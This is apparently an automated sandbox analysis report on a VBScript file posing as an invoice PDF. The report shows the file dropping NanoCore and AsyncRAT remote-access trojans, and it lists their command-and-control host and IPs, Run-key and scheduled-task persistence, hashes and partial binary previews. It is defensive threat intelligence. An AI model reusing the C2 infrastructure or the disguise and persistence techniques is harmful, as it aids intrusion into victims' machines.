            Local AccountsScheduled Task/Job2Logon Script (Mac)Scheduled Task/Job2Obfuscated Files or Information121NTDSSecurity Software Discovery211Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing12LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol11Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsVirtualization/Sandbox Evasion31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading2DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion31Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection12Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 404165 Sample: Invoice No F1019855_PDF.vbs Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 51 sys2021.linkpc.net 2->51 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus detection for dropped file 2->65 67 15 other signatures 2->67 10 wscript.exe 3 2->10         started        14 dhcpmon.exe 3 2->14         started        16 Notepads.exe 2->16         started        signatures3 process4 file5 43 C:\Users\user\AppData\Local\Temp\fi.exe, PE32 10->43 dropped 45 C:\Users\user\AppData\Local\Temp\ame.exe, PE32 10->45 dropped 83 Benign windows process drops PE files 10->83 85 VBScript performs obfuscated calls to suspicious functions 10->85 87 Uses schtasks.exe or at.exe to add and modify task schedules 10->87 18 ame.exe 14 7 10->18         started        22 fi.exe 1 10 10->22         started        47 C:\Users\user\AppData\...\dhcpmon.exe.log, ASCII 14->47 dropped 49 C:\Users\user\AppData\...49otepads.exe.log, ASCII 16->49 dropped signatures6 process7 dnsIp8 35 C:\Users\user\AppData\Roaming35otepads.exe, PE32 18->35 dropped 37 C:\Users\user\AppData\...\tmp4DD8.tmp.vbs, ASCII 18->37 dropped 69 Antivirus detection for dropped file 18->69 71 Multi AV Scanner detection for dropped file 18->71 73 Machine Learning detection for dropped file 18->73 25 Notepads.exe 2 18->25         started        29 wscript.exe 1 18->29         started        53 sys2021.linkpc.net 79.137.109.121, 10090, 11940, 49716 OVHFR France 22->53 55 191.96.25.26, 11940, 49725, 49726 AS40676US Chile 22->55 57 192.168.2.1 unknown unknown 22->57 39 C:\Program Files (x86)\...\dhcpmon.exe, PE32 22->39 dropped 41 C:\Users\user\AppData\Roaming\...\run.dat, data 22->41 dropped 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 22->75 file9 signatures10 process11 dnsIp12 59 sys2021.linkpc.net 25->59 77 Antivirus detection for dropped file 25->77 79 Multi AV Scanner detection for dropped file 25->79 81 Machine Learning detection for dropped file 25->81 31 schtasks.exe 29->31         started        signatures13 process14 process15 33 conhost.exe 31->33         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Invoice No F1019855_PDF.vbs29%VirustotalBrowse
            Invoice No F1019855_PDF.vbs23%ReversingLabsScript-WScript.Trojan.Heuristic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\Notepads.exe100%AviraTR/Dropper.Gen
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%AviraTR/Dropper.MSIL.Gen7
            C:\Users\user\AppData\Local\Temp\ame.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\fi.exe100%AviraTR/Dropper.MSIL.Gen7
            C:\Users\user\AppData\Roaming\Notepads.exe100%Joe Sandbox ML
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ame.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\fi.exe100%Joe Sandbox ML
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe81%VirustotalBrowse
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe91%MetadefenderBrowse
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
            C:\Users\user\AppData\Local\Temp\ame.exe62%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\ame.exe76%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT
            C:\Users\user\AppData\Local\Temp\fi.exe81%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\fi.exe91%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\fi.exe100%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
            C:\Users\user\AppData\Roaming\Notepads.exe76%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            7.2.dhcpmon.exe.c40000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
            3.2.ame.exe.500000.0.unpack100%AviraHEUR/AGEN.1106066Download File
            7.0.dhcpmon.exe.c40000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
            3.0.ame.exe.500000.0.unpack100%AviraTR/Dropper.GenDownload File
            26.0.Notepads.exe.ee0000.0.unpack100%AviraTR/Dropper.GenDownload File
            26.2.Notepads.exe.ee0000.0.unpack100%AviraHEUR/AGEN.1106066Download File
            30.0.Notepads.exe.f40000.0.unpack100%AviraTR/Dropper.GenDownload File
            4.2.fi.exe.4f70000.10.unpack100%AviraTR/NanoCore.fadteDownload File
            30.2.Notepads.exe.f40000.0.unpack100%AviraHEUR/AGEN.1106066Download File
            4.0.fi.exe.40000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
            4.2.fi.exe.40000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            sys2021.linkpc.net
            		79.137.109.121
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              true
              • Avira URL Cloud: safe
              		low
              sys2021.linkpc.netfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameame.exe, 00000003.00000002.537233135.0000000002BC0000.00000004.00000001.sdmpfalse
                  		high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  191.96.25.26
                  		unknownChile
                  		40676AS40676USfalse
                  79.137.109.121
                  		sys2021.linkpc.netFrance
                  		16276OVHFRfalse

                  Private

                  IP
                  192.168.2.1

                  General Information

                  Joe Sandbox Version:32.0.0 Black Diamond
                  Analysis ID:404165
                  Start date:04.05.2021
                  Start time:19:08:52
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 12m 16s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:Invoice No F1019855_PDF.vbs
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:33
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winVBS@14/9@20/3
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 38% (good quality ratio 27.1%)
                  • Quality average: 51.9%
                  • Quality standard deviation: 40.6%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 324
                  • Number of non-executed functions: 8
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .vbs
                  Warnings:
                  Show All
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Excluded IPs from analysis (whitelisted): 104.43.193.48, 104.42.151.234, 92.122.145.220, 52.147.198.201, 40.88.32.150, 93.184.221.240, 168.61.161.212, 20.82.210.154, 92.122.213.247, 92.122.213.194, 13.107.4.50, 52.155.217.156, 40.64.100.89, 20.54.26.129, 184.30.24.56, 20.50.102.62
                  • Excluded domains from analysis (whitelisted): mw1eap.displaycatalog.md.mp.microsoft.com.akadns.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, au-bg-shim.trafficmanager.net, consumerrp-displaycatalog-aks2eap-uswest.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, displaycatalog-uswesteap.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, Edge-Prod-FRA.env.au.au-msedge.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, cs11.wpc.v0cdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, e1723.g.akamaiedge.net, download.windowsupdate.com, afdap.au.au-msedge.net, skypedataprdcoleus16.cloudapp.net, au.c-0001.c-msedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  19:09:46API Interceptor956x Sleep call for process: fi.exe modified
                  19:09:47AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                  19:11:22Task SchedulerRun new task: Notepads.exe path: C:\Users\user\AppData\Roaming\Notepads.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  191.96.25.26Spec_PDF.vbsGet hashmaliciousBrowse
                    SpecPDF.vbsGet hashmaliciousBrowse
                      79.137.109.121Transcation03232016646pdf.exeGet hashmaliciousBrowse
                        NEW SC #ORDER.exeGet hashmaliciousBrowse
                          NEW SC #ORDER.exeGet hashmaliciousBrowse
                            NEW SC.exeGet hashmaliciousBrowse
                              NEW SC.exeGet hashmaliciousBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                sys2021.linkpc.netSpec_PDF.vbsGet hashmaliciousBrowse
                                • 105.112.11.245
                                SpecPDF.vbsGet hashmaliciousBrowse
                                • 179.43.166.32

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                AS40676US2f50000.exeGet hashmaliciousBrowse
                                • 38.39.192.78
                                PT6-1152.docGet hashmaliciousBrowse
                                • 45.61.136.72
                                PT6-1152.docGet hashmaliciousBrowse
                                • 45.61.136.72
                                wMqdemYyHm.exeGet hashmaliciousBrowse
                                • 104.217.141.249
                                70pGP1JaCf6M0kf.exeGet hashmaliciousBrowse
                                • 107.160.232.135
                                Spec_PDF.vbsGet hashmaliciousBrowse
                                • 191.96.25.26
                                8CgG2kY3Ow.dllGet hashmaliciousBrowse
                                • 45.61.138.153
                                DHL_S390201.exeGet hashmaliciousBrowse
                                • 45.34.249.30
                                978463537_BL FOR APPROVAL.docGet hashmaliciousBrowse
                                • 45.34.114.71
                                SpecPDF.vbsGet hashmaliciousBrowse
                                • 191.96.25.26
                                7mB68AZqJs.exeGet hashmaliciousBrowse
                                • 104.217.143.44
                                q3uHPdoxWP.exeGet hashmaliciousBrowse
                                • 172.107.55.6
                                NMpDBwHJP8.exeGet hashmaliciousBrowse
                                • 172.107.55.6
                                OrSxEMsYDA.exeGet hashmaliciousBrowse
                                • 107.160.118.15
                                swift note.xlsxGet hashmaliciousBrowse
                                • 107.160.118.15
                                sgJRcWvnkP.exeGet hashmaliciousBrowse
                                • 107.160.118.15
                                YPJ9DZYIpOGet hashmaliciousBrowse
                                • 107.169.29.204
                                IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                • 45.34.238.253
                                YZ1q5HY7kK.exeGet hashmaliciousBrowse
                                • 104.217.62.116
                                ORDER6798ERA-LBT.exeGet hashmaliciousBrowse
                                • 172.107.43.183
                                OVHFROutstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                • 51.89.73.159
                                SecuriteInfo.com.W32.MSIL_Troj.ASI.genEldorado.27642.exeGet hashmaliciousBrowse
                                • 66.70.204.222
                                Outstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                • 51.89.73.159
                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                • 51.89.73.159
                                New Order Request_0232147.exeGet hashmaliciousBrowse
                                • 149.202.85.210
                                Transcation03232016646pdf.exeGet hashmaliciousBrowse
                                • 79.137.109.121
                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                • 51.77.73.218
                                MZyeln5mSFOjxMx.exeGet hashmaliciousBrowse
                                • 66.70.204.222
                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                • 51.77.73.218
                                51086cc4_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                8aa43191_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                • 51.77.73.218
                                51086cc4_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                8aa43191_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                840e7dfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                840e7dfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                94765446_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                d192feb6_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                7bc33f1c_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                94765446_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                C:\Users\user\AppData\Roaming\Notepads.exeSpec_PDF.vbsGet hashmaliciousBrowse
                                  SpecPDF.vbsGet hashmaliciousBrowse
                                    C:\Users\user\AppData\Local\Temp\fi.exeSpec_PDF.vbsGet hashmaliciousBrowse
                                      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSpec_PDF.vbsGet hashmaliciousBrowse
                                        C:\Users\user\AppData\Local\Temp\ame.exeSpec_PDF.vbsGet hashmaliciousBrowse
                                          SpecPDF.vbsGet hashmaliciousBrowse

                                            Created / dropped Files

                                            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                            Process:C:\Users\user\AppData\Local\Temp\fi.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):207360
                                            Entropy (8bit):7.448816161442748
                                            Encrypted:false
                                            SSDEEP:3072:wzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIxuSAShCWi5bu/qaBAIfG8vabc:wLV6Bta6dtJmakIM5EFhCWKbuf+PL4Tl
                                            MD5:86A588C5A10A04AF998DBAD9FF9A31D1
                                            SHA1:8AC3E114D36F6674BF64D7F45221207E8575EA62
                                            SHA-256:B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
                                            SHA-512:8978104324435B461BE67E148D44271A04A86550C7C1D8C5F474B1A7E63DA32FD9400F63A767555F13A2CFB21EEC32AAC6CA387F39C048FD4E36333CF6747EC9
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Virustotal, Detection: 81%, Browse
                                            • Antivirus: Metadefender, Detection: 91%, Browse
                                            • Antivirus: ReversingLabs, Detection: 100%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            Reputation:low
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................`........... ........@.. ......................................................................8...W.... ...]........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc....]... ...^..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
                                            Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):525
                                            Entropy (8bit):5.2874233355119316
                                            Encrypted:false
                                            SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                            MD5:61CCF53571C9ABA6511D696CB0D32E45
                                            SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                            SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                            SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                            Malicious:true
                                            Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Notepads.exe.log
                                            Process:C:\Users\user\AppData\Roaming\Notepads.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):425
                                            Entropy (8bit):5.351599573976469
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhav:ML9E4KrgKDE4KGKN08AKhk
                                            MD5:BEBB66F4CB83D5C34857FE75DE3A8610
                                            SHA1:66FB475AADAE0D4542125C8E272D9D6BBFA555BB
                                            SHA-256:C1A8084313E66497C9F53D0F65E85AC2D4A840AF7FEBCCCFB3924F54BCF1BADC
                                            SHA-512:45181B8B60B7F0FD0D841F50592B9E83F7BADF1FFED040DFCAF5779BF5F653633D78B28E5AFA92A53E9DA965113E4A8E7A16456AE3A8FDF786B7DF6B3FEE5CE8
                                            Malicious:true
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ame.exe.log
                                            Process:C:\Users\user\AppData\Local\Temp\ame.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):654
                                            Entropy (8bit):5.374391981354885
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT
                                            MD5:C8A62E39DE7A3F805D39384E8BABB1E0
                                            SHA1:B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31
                                            SHA-256:A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383
                                            SHA-512:7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3
                                            Malicious:false
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..
                                            C:\Users\user\AppData\Local\Temp\ame.exe
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):121856
                                            Entropy (8bit):5.7883947305405865
                                            Encrypted:false
                                            SSDEEP:3072:eXPeQ7X4XTwzyt1IeqsH/ebouOtyr3OrKHDU:g7X4XTIytGeqsH/ebdOtvE
                                            MD5:F7F64EC1756119F19D52FB140E22382F
                                            SHA1:C4FA973B801D954562FE00AC7BD2C6D051AE6E2F
                                            SHA-256:C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
                                            SHA-512:F29A10012A4E7EF6989BCEA75554B12A17415FBA4D8181C6A2B3AE0E663FE59B4C5ED910583F898D5C36A5178041A9ADCF92EC758B45CEA082165E596D7061BA
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ame.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Virustotal, Detection: 62%, Browse
                                            • Antivirus: ReversingLabs, Detection: 76%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            • Filename: SpecPDF.vbs, Detection: malicious, Browse
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(..........."...0.................. ........@.. .......................@............@.....................................K.......v.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...v...........................@..@.reloc....... ......................@..B........................H............'............................................................/.\......V..;...$0.xC.=VD..b......9A..{....*..{....*..{ ...*r.(!.....}......}......} ...*..(!...*..{....*"..}....*..{....*...}......sH...}......sL...}....*f.(!.....(.....s!...(....*..{....*"..}....*j.(!.....sH...}......((...*..{....*"..}....*..*..*..{....*"..}....*v..(......2.s>...(?.....}'...*V..P.{)....{*...or...*..,......ioI......{,....{-...or...*.~....*.......*.~/...*.../...*.~0...*...0...*.~1...*
                                            C:\Users\user\AppData\Local\Temp\fi.exe
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):207360
                                            Entropy (8bit):7.448816161442748
                                            Encrypted:false
                                            SSDEEP:3072:wzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIxuSAShCWi5bu/qaBAIfG8vabc:wLV6Bta6dtJmakIM5EFhCWKbuf+PL4Tl
                                            MD5:86A588C5A10A04AF998DBAD9FF9A31D1
                                            SHA1:8AC3E114D36F6674BF64D7F45221207E8575EA62
                                            SHA-256:B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
                                            SHA-512:8978104324435B461BE67E148D44271A04A86550C7C1D8C5F474B1A7E63DA32FD9400F63A767555F13A2CFB21EEC32AAC6CA387F39C048FD4E36333CF6747EC9
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Virustotal, Detection: 81%, Browse
                                            • Antivirus: Metadefender, Detection: 91%, Browse
                                            • Antivirus: ReversingLabs, Detection: 100%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
